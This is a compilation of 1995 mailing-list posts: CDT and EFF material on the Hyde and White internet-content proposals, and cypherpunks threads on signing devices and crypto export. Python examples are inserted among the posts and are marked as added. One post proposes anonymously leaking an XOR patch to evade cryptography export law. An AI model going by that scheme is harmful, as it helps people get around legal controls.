between two proposals: one proposal sponsored by Representative Henry
Hyde (R-IL) and an alternative proposed by Rep. Rick White (R-WA).  The
Hyde proposal would severely restrict freedom of speech on the Internet,
and grant the Federal Communications Commission new authority to
regulate online content. The White proposal relies on parents, not
federal bureaucrats, to determine what material is and is not
appropriate for themselves and their children, though it also imposes
new criminal penalties for individuals who transmit material that is
"harmful to minors".

The outcome of this decision will have tremendous implications on the
future of freedom of expression and the development of interactive media
as a whole. If the Hyde proposal prevails, the Internet as we know it
will never be the same.

CDT firmly believes that no new laws in this area are necessary. Current
law is already working to punish online stalkers and prosecute the
distribution of obscene material online. However, choosing nothing is
not an option available to the Conference Committee. Given the options
before the committee, CDT believes that the effort of Congressman White
should be commended. He has tried to find a resolution to this issue
which preserves freedom of speech and relies on user empowerment over
government control of online content. Rep. White's proposal represents
the only option on the table which will not destroy the Internet and the
future of interactive communications technologies. Although this is a
difficult choice for the Net.Community, White must prevail at this
stage.

The Hyde proposal, which is being pushed heavily by the Christian
Coalition, would severely restrict freedom of speech and the democratic
potential of the Internet and other interactive media. It fails to
recognize the global, decentralized nature of interactive media and its
tremendous ability for user control. The proposal would be wholly
ineffective at accomplishing its stated objective of protecting children
from objectionable material, while destroying the Internet in the
process.

If the conferees choose Hyde's approach over White, the Federal
Communications Commission will, for the first time ever, have the
authority to regulate online content and the underlying technologies of
the net itself. In addition, the First Amendment and the free flow of
information online will be chilled by an overly broad "indecency"
standard. Online service providers will be forced to monitor all traffic
to ensure that no "indecent" material is transmitted (creating a
nightmare for freedom of speech and privacy), or shut down some service
altogether for fear of expensive lawsuits or prison sentences. And
although all these provisions can be challenged in court, recent history
with the so-called "dial-a-porn" and indecency on cable channels
(Alliance for Community Media vs. FCC) suggests that such challenges can
take years to resolve, and even then with no guarantee of success.

Representative White's approach seeks to protect cyberspace from
intrusion by the federal government, and to empower parents to make
decisions about what is and is not appropriate for themselves and for
their children. While the proposal does contain new criminal provisions,
including restrictions on the display of material that is "harmful to
minors", it also creates a defense to prosecution for those who take
good faith, reasonable efforts to label content and enable others to
block it using user control technologies.

The fate of the Net, and the future of freedom of speech and the
democratic potential of interactive media, now rests in the hands of the
conference committee members.

OVERVIEW OF THE HYDE AND WHITE PROPOSALS

I.  THE HYDE PROPOSAL

Representative Hyde is pushing an unconstitutional and overly regulatory
proposal which would criminalize the transmission and display of
"indecent material" (a broad classification which includes everything
from the so-called '7 dirty words' to classic works of fiction such as
The Catcher In the Rye and Ulysses), hold carriers liable for material
created by their subscribers, and grant the Federal Government broad new
authority over online content and the underlying technologies of the
Internet. The Hyde proposal has been endorsed by the Christian Coalition
and other members of the "religious-right".

Among other things, the Hyde proposal would:

1. Create $100,000 fines and 2 year jail terms for anyone who makes or
   makes available any indecent material to a minor (Sec 402 (d)).

2. Grant the FCC broad authority over online speech and over online
   technology (Sec (e)(1))

3. Criminalize the transmission or display of indecent material to
   anyone under 18 years of age (Amendment to 18 USC 1465),

4. Not pre-empt states from passing even more restrictive, or even
   inconsistent, regulations.

See CDT Policy Post No. 30 (December 1, 1995) for a detailed description
of the Hyde proposal. For more information, including the text of the
Hyde proposal and other relevant documents, visit CDT's net-censorship
issues page (http://www.cdt.org/cda.html)

II.  THE WHITE PROPOSAL

The proposal offered by Representative White, an original co-sponsor of
the Cox/Wyden/White "Internet Freedom and Family Empowerment" Amendment,
is based on the user empowerment aspects of the original Cox/Wyden/White
amendment.

The White proposal substitutes the narrower "harmful to minors" standard
for "indecency", and prohibits the FCC from imposing content regulations
on online speech and from meddling in the underlying technologies of the
Internet.  While the White proposal does prohibit the "display" of
material that is harmful to minors online, it creates a defense for
those who take good faith, reasonable steps, to label content and
enable users to block or filter objectionable material using user control
technologies (such as SurfWatch, the Parental Control features of AOL or
Prodigy, or the PICS standards being developed by MIT and the World Wide
Web Consortium).

Briefly, the White proposal would:

1. Prohibit intentionally sending material that is harmful to minors
   directly to someone the sender knows is a minor,

2. Prohibit the display of material that is harmful to minors. However,
   content providers (including individual users) would be immune to
   prosecution if they have taken good faith, reasonable efforts to
   label their content and enable it to be blocked or filtered by
   others (The MIT/World Wide Web consortium's PICS would be one
   example),

3. Prohibit the FCC from regulating content on or the technologies of
   the Internet and other interactive media,

4. Pre-empt inconsistent state laws, although this provision would not
   apply to individuals, non-profit providers of interactive computer
   services (such as BBS's or freenets), or non-profit organizations.

5. Clarify the House-passed Cox/Wyden/White to ensure that it does
   inadvertently create loopholes in ECPA or other privacy laws,

6. Protect online service providers from vicarious liability for
   transmitting their subscribers' messages or for merely providing
   access to the Internet.

III. BACKGROUND ON THE "HARMFUL TO MINORS" STANDARD

White's proposal would prohibit sending material that is "harmful to
minors" directly to a minor, as well as prohibit the display of material
that is "harmful to minors" unless good faith, reasonable steps are
taken to label and enable others to block access to such material.

Harmful to minors is an intermediate standard between indecency and
obscenity. It is essentially material that is obscene to a minor. It has
been used in 48 state statutes and has been ruled constitutional by the
Supreme Court. It is defined as follows:

"'harmful to minors' means any communications or material that is
obscene or that:

   (a)  taken as a whole, and with respect to minors, appeals to a
        prurient interest in nudity, sex, or excretion;

   (b)  depicts, represents, or describes in a patently offensive way
        with respect to what is suitable for minors, ultimate sexual
        acts, normal or perverted, actual or simulated, sado-masochistic
        acts or abuse; or lewd exhibition of the genitals, pubic area,
        buttocks, or post-pubertal female breasts; and

   (c)  taken as a whole, lacks serious literary, artistic, political,
        or scientific value for minors."

Materials that would be acceptable under this standard include the text
of Catcher in the Rye, Ulysses, the use of the "7 dirty words" in
context, and works of art which contain nudity. These same materials
would be prohibited under an "indecency" standard.

NEXT STEPS

Once the House conferees vote on Wednesday, the full House/Senate
conference committee will consider the issue. If the House conferees
accept the White proposal, there will be additional opportunities to
clarify and strengthen the proposal. However, if Hyde prevails, the
entire battle will be lost.

In addition to the "cyberporn issue", there are several other issues in
the telecommunications bill which the conferees must resolve, including
competition in the long distance market, cable rate regulation, and
universal service, to name a few. The Republican leadership has
reportedly instructed the conferees to finish all remaining issues this
week and to have the final bill ready for the full House and Senate
during the week of December 11. It is not clear whether this deadline
can actually be met given the range of unresolved issues, but the House
and Senate leadership appear committed to the timeline.

CDT will keep you informed of developments on this issue as they occur.
We will also post the text of the White proposal on our net-censorship
web page as soon as a final copy is available (we expect it to be posted
by Tuesday afternoon 12/5).

For more information, visit CDT's net-censorship issues page:

  http://www.cdt.org/cda.html

------------------------------------------------------------------------
(2) HOW TO SUBSCRIBE TO THE CDT POLICY POST LIST

CDT Policy Posts, which is what you have just finished reading, are the
regular news publication of the Center For Democracy and Technology. CDT
Policy Posts are designed to keep you informed on developments in public
policy issues affecting civil liberties online.

SUBSCRIPTION INFORMATION

1. SUBSCRIBING TO THE LIST

To subscribe to the policy post distribution list, send mail to
"Majordomo@cdt.org" with:

    subscribe policy-posts

in the body of the message (leave the subject line blank)


2. UNSUBSCRIBING FROM THE LIST

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@cdt.org" with the following command
in the body of your email message:

    unsubscribe policy-posts youremail@local.host (your name)

(leave the subject line blank)

You can also visit our subscription web page
URL:http://www.cdt.org/join.html

-----------------------------------------------------------------------
(3) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance constitutional civil liberties
and democratic values in new computer and communications technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1001 G Street NW * Suite 500 East * Washington, DC 20001
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post No. 31                                        12/4/95
-----------------------------------------------------------------------

   

Below is an open letter to Internet users from Rep. Rick White (R-WA),
co-sponsor of the Cox/Wyden/White anti-censorship legislation, discussing
his new proposed amendment to the telecom bill, which is now in joint
conference committee.  As most of you are aware, several amendments to
the bill, many of them conflicting, are to be "reconciled", with the
result, constitutional or otherwise, being sent to both houses of
Congress for (likely) final approval, and thence to the President for his
(at least fairly likely) signature.  Among those amendments are several
patently unconstitutional proposals, from the original Exon/Coats
"Communications Decency Act", to a new, even more censorious amendment
supported by the Christian Coalition, Ed Meese, and other representatives
of the "religious right".

EFF does not endorse any of the proposals that have been floated in
the conference committee.  We take the position that no content-control
legislation should be passed. EFF remains committed to mounting
constitutional challenges in court to any such legislation that passes.


[begin forward]

From: REPWHITE@HR.HOUSE.GOV
Date: 04 Dec 1995 22:07:22 EST
Subject: An open letter from Rep. Rick White to the Internet Communi
To: mech@EFF.ORG

Please forward this message to interested members of the Internet community.

Thank you.

Congressman Rick White

--

AN OPEN LETTER TO THE INTERNET COMMUNITY

December 4, 1995

To members of the Internet Community and Concerned Citizens:

     For the past several months, I have closely followed the online debate
over Congressional attempts to impose content controls on the Internet.  Your
phone calls, letters, and email were instrumental in convincing 420 of my
House colleagues to support the Cox/Wyden/White "Internet Freedom and Family
Empowerment Act."

     As you may know, on Wednesday, December 6th, the Telecommunications
Reform Legislation Conference Committee, of which I am a member, will choose
between two competing proposals:  one offered by my colleague, House
Judiciary Committee Chairman Henry Hyde (R-IL), and my own proposal.  I
believe that the decision we reach on Wednesday will have a significant
impact on the future of the Internet.  While many of us who use the Internet
feel that Congress should steer clear of any new regulation of the Internet
and online information services, the reality is that proponents of more
severe restrictions on online content have been successful in convincing many
in Congress that new regulations are necessary.

     The conference committee is charged with reconciling several competing
approaches to addressing children's access to objectionable material online.
 In June, the Senate, by an overwhelming majority passed the Exon/Coats
"Communications Decency Act."  In August, the House passed the
Cox/Wyden/White "Internet Freedom and Family Empowerment Act," which
emphasized parental empowerment over government content regulations.  At the
same time, the House also approved a new indecency crime sponsored by
Chairman Hyde.

     As an avid Internet user and a strong believer in the enormous potential
of cyberspace to educate, expand commercial opportunities, and create jobs,
I have developed an alternative proposal that I expect to offer to conferees
on Wednesday.  My proposal will ensure freedom of speech and encourage the
development of technological tools to help parents prevent their children
from accessing inappropriate material online.  It would also prohibit the
Federal Communications Commission from controlling online content and from
meddling in the underlying technologies of the net.

     In addition, my proposal will create tough penalties for those few bad
actors who send truly objectionable material directly to minors or display
such material.  However, those who make good faith, reasonable efforts to
label content and enable it to be blocked or filtered by parental control
technologies (such as the PICS standards currently being developed by MIT and
the World Wide Web Consortium) would be immune from prosecution.

     Briefly, my proposal:

*  Substitutes the narrow, "harmful to minors" standard instead of the
   broad, vague, and constitutionally suspect "indecency" standard.
   The "harmful to minors" standard refers to material that is sexually
   explicit and, taken as a whole, lacks serious literary, artistic,
   political or scientific value for minors.

*  Prohibits the Federal Government from regulating online content or
   from having oversight over the underlying technologies of the net.

*  Would prohibit displaying material that is "harmful to minors," but
   create immunity for those who make good faith and reasonable efforts
   to implement parental empowerment technologies that enable screening
   of unwanted content.

*  Would not impose liability on online service providers merely for
   transmitting the messages of their users.

     At this time, the only option for the conference committee is to choose
between the White proposal or the Hyde substitute amendment.  As the only
option that minimizes government intrusion on freedom of speech, relies on
parents to make their own choices about what material comes into their homes,
and prevents the FCC from imposing regulations on online content, I hope you,
as well as my colleagues in Congress, will agree with my approach.

                              Sincerely,
                                   /s/
                              Rick White
                              Member of Congress

*************************************************
http://www.house.gov/white/welcome.html
repwhite@hr.house.gov
*************************************************

[end forward]



--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>       Online Activist    </HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@taussky.cs.colorado.edu>
Date: Wed, 6 Dec 95 17:57:24 PST
To: Alex Strasheim <cp@proust.suba.com>
Subject: My conception of the ideal encryption tool for the masses
In-Reply-To: <199512060918.DAA06957@proust.suba.com>
Message-ID: <199512070158.SAA11862@taussky.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Alex Strasheim <cp@proust.suba.com> wrote:
>
> I don't know what blancw was getting at, but I'll take up his side of the
> argument.  Can good security really be automated so well that people will
> have it without thinking about it? 
> 
> I create accounts at an ISP, and 90% of the people who walk in the door
> pick terrible passwords, even after listening to a little speech about
> what makes a good one.  I'd be willing to bet that more than half the
> people using PGP have passphrases that would fall quickly to a dictionary
> attack. 


Yes, but even if your PGP passphrase is "pass", using
PGP gives you excellent security against anyone who
can't get access to your secret key.


I envision "Joe User" security as a pocket-computer 
that has very limited capability.  Basically it can
input data (but not executable code!), put Joe's 
authentication-stamp (a.k.a. "signature", although 
that's a misnomer) on that data, and output it.


It only does this in response to some kind of
authentication-action from Joe himself.  Perhaps he
inputs a 4-digit PIN.  (It should be designed so that
he can keep the PIN-input-device out of sight, say in
his pocket, while using it.)  Furthermore it should
have an amnesia function where brute-forcing the PIN
fails (possibly wiping the secret key) and a duress
code PIN which fakes normal operation.  (Possibly the 
duress code replaces all the incoming data with "HELP 
I'M BEING HELD UNDER DURESS!" before stamping it and
outputting it, then wipes the secret key and continues
to operate in fake mode.)


And of course its hardware should be "tamper-resistant"
for whatever that's worth.


I guess it should have a one-time function (burnable
ROM or whatever) which generates the secret key so that
Joe can generate the key himself rather than having it
done at the factory.  It would be nice if Joe could
make a back-up of his secret key, but I don't see
any way to do that without weakening the protection on
it.


Does this sound like something Joe could learn how to
use properly, and trust enough to store a few hundred 
dollars in?  He can choose his PIN himself and his 
duress PIN can be a variation of the normal one.  One
problem is that Joe can't necessarily tell what
information is being fed into his "stamper" to be
stamped.  Possibly it could have an LCD display for
that purpose...



Hopefully it is apparent what kind of use this tool can
be put to.  For example, Joe picks up a carton of
milk at the grocery store, the store's cash register 
submits a bill for $2.00 to Joe's stamper, which stamps 
it, and Joe leaves.  The grocer can submit Joe's signed
IOU to Joe's bank at his/her leisure later.



Variations on this theme.  The main issue is how Joe 
can keep track of what information he is stamping.



Regards,

Bryce

signatures follow


      "To strive, to seek, to find and not to yield."  -Tennyson
            <a href="http://www.c2.org/~bryce/Niche.html">

                          bryce@colorado.edu                </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMMZKHPWZSllhfG25AQEbSgP9HOYLQtCuEiok/JCvxHnq1Xxvx7aeXZH9
8OaC0GPEPFFNSnjerLTcvkbrn04JjHNBC10eMx3I8/jSTB6817M+M8+aTzqC44rH
m2krfLCOMPXXHejDJgzPn/OlsLRKzi1HgeiHphpL1NGoRyNk+mKzBmq59EbvOqeF
aSrF6QuEEpw=
=rHnb
-----END PGP SIGNATURE-----
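
The "stamper" described in the message above, modelled as a small state machine. This is an added example, not code from the post or its author. Assumptions: all class and method names are hypothetical, the retry limit of 3 is invented (the post gives none), and HMAC-SHA256 stands in for the public-key signature, so verifier() plays the role of the public key handed to the bank.

```python
import hashlib
import hmac
import secrets

MAX_BAD_PINS = 3  # assumption: the post names no retry limit
DURESS_TEXT = b"HELP I'M BEING HELD UNDER DURESS!"  # wording from the post


class DeviceWiped(Exception):
    """Raised once the amnesia function has erased the key."""


class Stamper:
    """Toy model of the pocket 'stamper'. All names here are hypothetical."""

    def __init__(self, pin: str, duress_pin: str):
        if pin == duress_pin:
            raise ValueError("duress PIN must differ from the normal PIN")
        self._key = secrets.token_bytes(32)  # generated on the device itself
        # Hashing a 4-digit PIN gives no offline protection; the retry
        # counter in stamp() is what actually defends it.
        self._pin = self._digest(pin)
        self._duress = self._digest(duress_pin)
        self._bad_pins = 0
        self._fake_mode = False

    @staticmethod
    def _digest(pin: str) -> bytes:
        return hashlib.sha256(pin.encode()).digest()

    def _mac(self, data: bytes) -> bytes:
        return hmac.new(self._key, data, hashlib.sha256).digest()

    def verifier(self):
        """Stand-in for giving the bank a public key at enrolment."""
        key = self._key  # captured now; survives a later wipe on the device

        def verify(data: bytes, tag: bytes) -> bool:
            good = hmac.new(key, data, hashlib.sha256).digest()
            return hmac.compare_digest(good, tag)

        return verify

    def stamp(self, pin: str, data: bytes):
        """Return (stamped_data, tag), or None when the PIN is refused."""
        if self._key is None:
            raise DeviceWiped("key erased after repeated bad PINs")
        guess = self._digest(pin)
        is_pin = hmac.compare_digest(guess, self._pin)
        is_duress = hmac.compare_digest(guess, self._duress)
        if not (is_pin or is_duress):
            self._bad_pins += 1
            if self._bad_pins >= MAX_BAD_PINS:
                self._key = None  # amnesia: brute-forcing the PIN fails
            return None
        self._bad_pins = 0
        if is_duress and not self._fake_mode:
            # Replace the input, stamp the alarm with the REAL key so the
            # bank can trust it, then wipe and carry on with a throwaway key.
            out = (DURESS_TEXT, self._mac(DURESS_TEXT))
            self._key = secrets.token_bytes(32)
            self._fake_mode = True
            return out
        # Normal operation, or fake mode: looks the same from outside, but
        # fake-mode tags no longer verify against the enrolled key.
        return data, self._mac(data)


if __name__ == "__main__":
    joe = Stamper("4821", "4822")  # constructed PINs
    bank_verify = joe.verifier()
    bill, tag = joe.stamp("4821", b"IOU $2.00 to grocer")
    print("normal stamp verifies:", bank_verify(bill, tag))
    alarm, tag = joe.stamp("4822", b"IOU $500.00")
    print("duress output:", alarm, "verifies:", bank_verify(alarm, tag))
    bill, tag = joe.stamp("4821", b"IOU $500.00")
    print("stamp after duress verifies:", bank_verify(bill, tag))
```

The model makes the open question in the post concrete: stamp() signs whatever bytes it is handed, so without a trusted display Joe cannot tell a $2.00 bill from a $500.00 one.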




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 6 Dec 95 16:36:48 PST
To: cypherpunks@toad.com
Subject: SEQ_uel
Message-ID: <199512070037.TAA07593@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Science, Dec 1, 1995.

   "The Evolution of Molecular Computation." By Willem
   Stemmer. Comments on the limitations of Leonard Adleman's
   and Richard Lipton's DNA-computation research compared to
   the utility of sequence evolution computation.

      Although DNA sequencing of the selected solutions poses
      a practical problem for molecular computation, this
      drawback does not exist for computation with genetic
      algorithms or for in vitro evolution or computer
      simulations of natural evolution, called artificial
      life. Sequence evolution appears to be a useful general
      tool for solving many complex problems, whether the
      solution is a number, sequence, program, or structure.


   SEQ_uel  (6 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 6 Dec 95 20:19:17 PST
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Solution for US/Foreign Software?
Message-ID: <m0tNXBk-000930C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:36 PM 12/6/95 -0800, you wrote:
>>>>1.  Write a program with limited encryption (40 bit?), with the encryption
>>>>module in a file external to the  main program.
>>>>2.  Get export approval for this program.
>>>>3.  Write a module which replaces the encryption file, increasing key size
>>>>to whatever you REALLY wanted in the first place.  (128-bit IDEA, 2000-bit
>>>>PGP, etc.)
>>>>4.  Ship that new module with the old software to US customers.
>>>>Naturally, that new module will "leak," so anybody who buys the old
>
>Tim May replied
>>>"Crypto hooks," basically the scheme you are proposing, were thought of by
>>>the authorities and are not a bypass of the crypto export laws.
>
>I had interpreted the suggestion differently - rather than a system with 
>user-accessible crypto hooks, the manufacturer could ship a binary patch
>upgrade for US customers to install.  The internal design would presumably
>have crypto hooks (i.e. subroutine calls); they can't ban that.
>
>Of course, if you follow this strategy, get export approval for version 1.0,
>and ship the US-only patch as 1.1, getting export approval for version 2.0
>may be a shade more difficult...


And you get the prize because YOU guessed right! Sorry if I wasn't more clear.  

My premise:  Every program of length "n" bytes is simply an XOR away from
every OTHER program of length "n" bytes.  If one of those programs is the
export-allowed program and the other is the export-forbidden program, the
XOR file is the difference between them.   The "only" problem is to generate
the "XOR" file and get it out of the country.  The "getting it out of the
country" part is easy and will presumably happen because somebody not known
to the company does it.  At that point, the only problem is authentication:
This can be done easily using existing PGP digital signatures.

Obviously, only one copy of the XOR file needs to be exported, at least per
revision.  It is arguable that the export of that XOR file is illegal; so be
it.  It would be exported by an unknown person, using an unknown method, and
uploaded anonymously to a foreign server, all without the knowledge,
cooperation, or approval of the company.  
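
The XOR premise and the authentication step from the message above, worked through on two constructed 19-byte stand-ins for the two builds. This is an added example, not code from the post. Assumptions: the function names and sample bytes are hypothetical, and a pinned SHA-256 digest of the intended result stands in for checking a PGP signature.

```python
import hashlib


def xor_delta(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings; the premise needs equal length."""
    if len(a) != len(b):
        raise ValueError("XOR delta is only defined for equal-length files")
    return bytes(x ^ y for x, y in zip(a, b))


def changed_offsets(delta: bytes) -> list:
    """Offsets where the two files differ: the delta is zero everywhere else."""
    return [i for i, byte in enumerate(delta) if byte]


def apply_delta(base: bytes, delta: bytes, signed_sha256: str) -> bytes:
    """Rebuild the target and refuse it unless it matches the signed digest.

    XOR always "succeeds": a corrupted or substituted delta, or the wrong
    base file, yields some other program of the same length without error,
    so the check on the result is the only protection.
    """
    out = xor_delta(base, delta)
    if hashlib.sha256(out).hexdigest() != signed_sha256:
        raise ValueError("rebuilt file does not match the signed digest")
    return out


# Constructed sample data, not real program images.
BUILD_A = b"HDR\x00keybits=040;END"
BUILD_B = b"HDR\x00keybits=128;END"
BUILD_B_SHA256 = hashlib.sha256(BUILD_B).hexdigest()  # the value that is signed

if __name__ == "__main__":
    delta = xor_delta(BUILD_A, BUILD_B)
    print("differing offsets:", changed_offsets(delta))
    print("rebuilt ok:", apply_delta(BUILD_A, delta, BUILD_B_SHA256) == BUILD_B)
```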





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Dec 95 18:26:14 PST
To: cypherpunks@toad.com
Subject: Re: unsuscribe
Message-ID: <aceb90f4000210048aa8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


First, Mary Rose wrote:
>unsuscribe


And then KLEMEN RAMOVES wrote:


plz..unsuscribe me..
klemen@lj

klemen@Lj
-oz.sik.si

I sanse a patern, a change in the Englash linguage that I seem to have mist.

Hmmhhh....


--Tiim Mae, Cyperponk


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 6 Dec 95 17:48:37 PST
To: cypherpunks@toad.com
Subject: Re: News on Congressional Debate on Exon
Message-ID: <v02120d00acebf5584a6b@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Tim wrote:
>>If the Exon Bill really does go into effect, and age limits on access are
>>imposed, I'll be looking for what we've always joked about: the
>>"Information Superhighway Driver's License."

To be perfectly honest, whenever I talked about this topic I wasn't joking.

Prepare to see "felony Internet access" on the books before long.




-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: German Santos Jaimes <germans@exodus.dgsca.unam.mx>
Date: Wed, 6 Dec 95 17:59:31 PST
To: KLEMEN RAMOVES <KLEMEN@lj-oz.sik.si>
Subject: unsuscribe
In-Reply-To: <01HYIAGKS0OI0006XT@arnes.si>
Message-ID: <Pine.SV4.3.91.951206195647.19448A-100000@exodus>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 6 Dec 95 20:22:42 PST
To: cypherpunks@toad.com
Subject: Re: [FYI] FBI Training Eastern European Police
Message-ID: <199512070422.UAA22589@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave Del Torto wrote:


>   FBI School Teaches New Tricks to Old Enemies
      ...
>   In matching navy blue polo shirts, the students sat transfixed as
>   they watched slides showing the destruction of the Oklahoma City and
>   World Trade Center bombings.
> 
>   "God forbid you should ever have anything like this happen over
>   here," American instructor Ed Burwitz told his Central European
>   class, outfitted with headphones for simultaneous translation of the
>   lecture. "It is a tough task for any
>   freedom-loving country to prevent terrorism," he added.
      ...
>   The United States fronted $2.5 million to renovate the campus, which
>   includes a brand-new gym, classrooms, dormitories and one of
>   Hungary's few indoor tennis courts. The Hungarian government
>   contributed $500,000 to renovate the facility,
>   but the U.S. will pay the $3.5 million yearly cost to operate the
>   center, which is modeled after the law enforcement training center in
>   Quantico, Va.
>
>   Students from Hungary, Russia, Poland, the Czech Republic and other
>   Central and Eastern European nations attend ILEA's 8-week sessions,
>   the first of which began in April.
>
>   The idea is to help the Eastern Europeans with their burgeoning
>   crimes problems, as well as to foster cooperation on international
>   crime problems.

This sounds like a capital idea.  

I'm certain that the FBI and other law-enforcement officials might
also learn by living in a city where the East truly meets the West.

Budapest is a beautiful old city of bridges, not just literally but
figuratively.  It's where anyone in the world can find comfort.

Americans, French, German, Syrian ... all can use it for transit.

And the annual Grand Prix is one heck of a car race as well.  An
international grand-luxe congregation opportunity.  Burwitz probably
doesn't consider Budapest a hardship post.  Especially if he found
himself a shack up in the hills of Buda on Rose Hill.

>   "I'm amazed at the freedom of travel that is possible" after the
>   opening up of the Eastern nations, Burwitz said. But "that means
>   criminals can travel as well," he said, allowing them to traffic
>   drugs and contraband. "The more interaction we have with these
>   countries in law enforcement, the better it will be for emerging
>   democracies," Kaciban said.

If Burwitz is concerned with emerging democracies, he might profit
from reading some briefing papers, and leaving some of his
pre-conceptions at the door.  Especially, if he plans on getting full
value from his visit.  True bang for the buck, as it were.

Hungary has always been open to "free travel".  

That's why they had a Hilton and an Inter-Continental in Budapest.  In
fact, the "collapse" of the Berlin Wall -- which was missed by most
intelligence agencies -- was a direct result of free travel on the far
side of the "Iron Curtain".

There was always travel freedom within COMECON.  There had to be.
Truckers as an example traveled throughout the East.  And there were
always family vacations as well.  What was missing was a way to have
large population movements from East to West.  Migration.

Hungary solved that problem when it opened its border with its
historic ally-cum-subjugator, Austria.  Hungary's boldness allowed
East Germans -- skilled East Germans -- to exit in large number to
Austria during their ostensible "vacations" to Hungarian resorts.

They transited Austria to West Germany where they had guaranteed
citizenship, and were assured employment because of their skill-set.
This massive population flow of skilled workers is what ultimately
led to East German collapse and the subsequent German re-unification.

It was Hungarian and Austrian policy co-operation that allowed Germany
to re-join its two halves.  A co-operation that flowed from an
extended period of Austrian investment in Hungarian enterprise.

(I guess Germany owes Hungary one for that.)  

But the "unification" does lead to some interesting problems, as the
non-migratory East German population -- the ones whose skills were not
as marketable;  or alternatively, those who had valuable skills but
were philosophically aligned with the old regime -- are absorbed into
the Western EU fabric. 

Assimilation can be a very difficult process when attempts are made to
integrate into the German economy those who choose _not_ to migrate
especially if they are either unfit for, or opposed to their
Liberators.  

Eliminating communism did not eliminate the communists.

If Burwitz gets briefed on some history, I'm sure that many things
will fall into context for him, and there will be a greater
understanding of the enemy that he's teaching people to fight.  It's
always good to understand the scope of a problem before you attack it.

That can only help with gaol achievement.

>   Organized crime is doubly damaging to the emerging nations, because
>   it undermines their economies, Kaciban said. Investors are naturally
>   reluctant to dump money into a nation if they believe there is
>   rampant corruption. 

I don't think that "investors" are ever reticent about exploiting
opportunities -- if they are in fact welcome to, and not locked 
out.  Unfortunately many opportunities are only extended by
invitation to a select group of friends and not to an open field.

This is true in Europe as well as anywhere in the world.  Politicians
as an example get access to certain opportunities -- Hillary Clinton's
futures investments, or the Canadian equivalent, Alberta Premier Ralph
Klein's wife's investment in Multi-Corp, as an example.

At its extreme, Kaciban is correct, this can lead to rampant
corruption, something which is best prevented.  But that is not the
situation we are faced with in the East.  In the East, there is an
understanding that business is about relationships and understandings.

Working relationships.

Anyone that a firm would expect to have a contract with, isn't
probably someone you should be sharing a bed with -- as they say -- in
the first place.

>   Some teachings do not translate for the European
>   students. For example, there is no Russian RICO - the Racketeer
>   Influenced and Corrupt Organizations Act that is one of the strongest
>   American legal tools against organized crime.

Some teachings also probably don't translate well for the American
instructors.  Cultural differences and expectations, as an example,
which are born out of history.

While the idea of a Russian RICO is interesting, it's not overly
realistic.  RICO is meant for a region that has established rules of
engagement -- the breach of which calls for quick "rubber-hose"
justice to ensure the system continues to function.  RICO is best
reserved, in that sense for a litigious America, to make sure that
everyone remembers where their allegiance should lie.

It has very little applicability in a chaotic system.  Not only is
there nothing to "preserve" -- but it truly begs the question of who'd
administer a Russian RICO?  

You can't expect someone who's earning the equivalent of $50/month
not to supplement their official "pay".

>   Eastern European crime syndicates tend not to be based in crime
>   families, instructors said. And organized crime in Russia and Ukraine
>   is so much a part of the society, that it's hard to stop it, said Amy
>   O'Neil, a State Department official not involved in the ILEA.

Yep.  This is a very serious problem.  

Some circles have suggested that the Russian nationalist Zhirinovsky
is involved in some fashion in these syndicates; they've drawn a
parallel to Sinn Fein.

Others think that there is a utilization of KGB remnants (including
those former communists which have now been _absorbed_ into the
"unified" Germany, and continue to hold positions of power there).
They believe that these sympathizers wish to restore and rebuild
Mother Russia and the old social state.  

Some believe that these elements -- those that have a political /
nationalistic allegiance -- are very friendly with the Eastern
European crime syndicates.  A reciprocal arrangement, if you will.

One thing is clear.  Whether or not any of the foregoing hold, or
whether or not this syndicate's motivations are capitalistic or
nationalistic -- their tentacles extend worldwide.  Not only through a
Moscow - St. Petersburg - Frankfurt - Brussels backbone, but even into
the heartland of the United States.

Hard to believe??

The FBI (I think) has identified about 220 "Eurasian" (mostly Russian)
